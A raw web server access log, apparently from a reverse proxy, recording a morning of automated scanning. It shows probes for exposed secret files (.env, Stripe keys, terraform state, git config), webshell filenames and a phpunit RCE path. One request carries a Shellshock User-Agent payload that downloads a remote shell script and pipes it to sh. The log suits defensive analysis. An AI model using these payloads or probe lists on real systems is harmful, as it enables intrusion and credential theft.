http 92.249.249.197 "/storage/logs/stripe.log" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/storage/logs/payments.log" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/backup/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:35 +0000] 404 - GET http 92.249.249.197 "/stripe.backup" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:36 +0000] 404 - GET http 92.249.249.197 "/stripe.old" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:36 +0000] 404 - GET http 92.249.249.197 "/stripe.bak" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/.env.stripe" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/.env.production" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/terraform/stripe.tf" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/.terraform/stripe.tfstate" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/config/s3_config.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/.github/secrets/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/.gitlab/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/.gitlab-ci/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/.circleci/stripe.env" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/storage/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/storage/stripe.keys" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/storage/keys/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:00:37 +0000] 404 - GET http 92.249.249.197 "/storage/secrets/stripe.json" [Client 45.148.10.247] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "-" +[15/Jan/2026:07:14:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:07:14:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:07:15:49 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[15/Jan/2026:07:17:51 +0000] 404 - GET http 92.249.249.197 "/hudson" [Client 20.38.33.240] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[15/Jan/2026:07:24:32 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:07:32:48 +0000] 404 - GET http profibot.direct.quickconnect.to "/.git/config" [Client 195.178.110.191] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[15/Jan/2026:07:33:06 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:07:35:58 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[15/Jan/2026:07:39:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:07:48:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.80] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:07:48:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 199.45.155.80] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:08:06:39 +0000] 400 - - http localhost "-" [Client 162.142.125.222] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:08:06:49 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 109.199.104.175] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.78.1 (KHTML like Gecko) Version/7.0.6 Safari/537.78.1" "-" +[15/Jan/2026:08:07:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:08:10:12 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:08:21:57 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:08:24:33 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:08:30:41 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:08:45:40 +0000] 200 - GET http 92.249.249.197 "/" [Client 83.76.52.161] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:08:56:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:09:02:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:09:09:07 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 41.237.105.161] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:09:10:58 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[15/Jan/2026:09:10:58 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 0] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[15/Jan/2026:09:11:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:09:22:53 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:09:46:31 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:09:47:24 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:09:53:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:09:56:58 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 188.166.158.67] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[15/Jan/2026:09:56:58 +0000] 404 - GET http 92.249.249.197 "/.git/config" [Client 188.166.158.67] [Length 122] [Gzip 1.35] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[15/Jan/2026:10:06:28 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0" "-" +[15/Jan/2026:10:06:28 +0000] 404 - GET http 92.249.249.197 "/api/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A525 Safari/8536.25" "-" +[15/Jan/2026:10:06:28 +0000] 404 - GET http 92.249.249.197 "/backend/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/10.04 Chromium/14.0.813.0 Chrome/14.0.813.0 Safari/535.1" "-" +[15/Jan/2026:10:06:28 +0000] 404 - GET http 92.249.249.197 "/admin/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.3; en-ca; KFTT Build/IML74K) AppleWebKit/537.36 (KHTML, like Gecko) Silk/3.68 like Chrome/39.0.2171.93 Safari/537.36" "-" +[15/Jan/2026:10:06:28 +0000] 404 - GET http 92.249.249.197 "/.env.example" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; pt-pt) AppleWebKit/418.9.1 (KHTML, like Gecko) Safari/419.3" "-" +[15/Jan/2026:10:06:29 +0000] 404 - GET http 92.249.249.197 "/app_dev.php/_profiler/phpinfo" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36 OPR/52.0.2871.30" "-" +[15/Jan/2026:10:06:29 +0000] 200 - GET http 92.249.249.197 "/?phpinfo=-1" [Client 78.153.140.177] [Length 1033] [Gzip -] "Opera/9.01 (X11; Linux i686; U; en)" "-" +[15/Jan/2026:10:06:29 +0000] 404 - GET http 92.249.249.197 "/Backend/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; U; en-GB; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.61" "-" +[15/Jan/2026:10:06:29 +0000] 404 - GET http 92.249.249.197 "/Application/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36 OPR/46.0.2597.57" "-" +[15/Jan/2026:10:06:29 +0000] 404 - GET http 92.249.249.197 "/sendgrid/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.5; en-nz; GT-S5570 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[15/Jan/2026:10:06:29 +0000] 404 - GET http 92.249.249.197 "/staging.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2" "-" +[15/Jan/2026:10:06:29 +0000] 404 - GET http 92.249.249.197 "/dashboard/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" "-" +[15/Jan/2026:10:06:29 +0000] 404 - GET http 92.249.249.197 "/php-info" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.39" "-" +[15/Jan/2026:10:06:30 +0000] 404 - GET http 92.249.249.197 "/services/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36" "-" +[15/Jan/2026:10:06:30 +0000] 404 - GET http 92.249.249.197 "/config/secrets.yml" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.5; es-ve; CM980 Build/HuaweiCM980) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[15/Jan/2026:10:06:30 +0000] 404 - GET http 92.249.249.197 "/admin/info.php" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.21 Safari/537.36 OPR/40.0.2308.3 (Edition beta)" "-" +[15/Jan/2026:10:06:30 +0000] 400 - GET http 92.249.249.197 "/server.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:10:06:31 +0000] 404 - GET http 92.249.249.197 "/env.json" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.70 (Linux i686 ; U; zh-cn) Presto/2.2.0" "-" +[15/Jan/2026:10:06:31 +0000] 404 - GET http 92.249.249.197 "/core/.env.prod" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)" "-" +[15/Jan/2026:10:06:31 +0000] 404 - GET http 92.249.249.197 "/uploads/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU OS 10_3_2 like Mac OS X) AppleWebKit/603.2.4 (KHTML, like Gecko) Version/10.1 Mobile/14F89 Safari/602.1" "-" +[15/Jan/2026:10:06:31 +0000] 404 - GET http 92.249.249.197 "/shop/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5" "-" +[15/Jan/2026:10:06:31 +0000] 404 - GET http 92.249.249.197 "/assets/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.80 (Macintosh; Intel Mac OS X 10.8.2) Presto/2.12.388 Version/12.10" "-" +[15/Jan/2026:10:06:31 +0000] 404 - GET http 92.249.249.197 "/sendgrid.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36" "-" +[15/Jan/2026:10:06:32 +0000] 404 - GET http 92.249.249.197 "/sources/.env.prod" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/9.22 (Windows NT 5.1; U; fr)" "-" +[15/Jan/2026:10:06:32 +0000] 404 - GET http 92.249.249.197 "/sources/.env.production" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/536.26.17 (KHTML like Gecko) Version/6.0.2 Safari/536.26.17" "-" +[15/Jan/2026:10:06:32 +0000] 404 - GET http 92.249.249.197 "/v1/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20060814 Firefox/3.0a1" "-" +[15/Jan/2026:10:06:32 +0000] 404 - GET http 92.249.249.197 "/js/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 10_1 like Mac OS X) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0 Mobile/14B67 Safari/602.1" "-" +[15/Jan/2026:10:06:32 +0000] 404 - GET http 92.249.249.197 "/boot/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; SM-G900F Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.95 Mobile Safari/537.36" "-" +[15/Jan/2026:10:06:32 +0000] 404 - GET http 92.249.249.197 "/run/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Ubuntu/11.04 Chromium/14.0.814.0 Chrome/14.0.814.0 Safari/535.1" "-" +[15/Jan/2026:10:06:32 +0000] 404 - GET http 92.249.249.197 "/proc/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 GTB7.0" "-" +[15/Jan/2026:10:08:39 +0000] 400 - GET http 92.249.249.197 "/api/sonicos/is-sslvpn-enabled" [Client 185.156.73.73] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.google.com" +[15/Jan/2026:10:08:39 +0000] 400 - GET http 92.249.249.197 "/" [Client 185.156.73.73] [Length 654] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" "https://www.google.com" +[15/Jan/2026:10:13:22 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:10:14:13 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.149.159] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:10:26:15 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[15/Jan/2026:10:34:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:10:34:32 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:10:34:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:10:34:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:10:34:34 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:10:34:35 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 95.214.55.246] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:10:35:37 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:10:37:40 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.197.182] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:10:37:51 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:10:46:18 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:10:47:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/ver.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/ultra.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/pro.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:28 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-good.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/e.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/data.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/z.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/css.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/image.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/file22.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/check.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-header-json.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:30 +0000] 404 - GET http profibot.direct.quickconnect.to "/fm.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/1.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/ws.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/xxxx.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-configs.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/xmlrpc.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:31 +0000] 404 - GET http profibot.direct.quickconnect.to "/file56.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/990.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/error.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:10:47:32 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 132.196.4.69] [Length 150] [Gzip -] "-" "-" +[15/Jan/2026:11:00:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:11:02:24 +0000] 404 - GET http 92.249.249.197 "/manager/text/list" [Client 40.119.28.203] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[15/Jan/2026:11:27:32 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:11:40:36 +0000] 404 - GET http 92.249.249.197 "/.env" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) 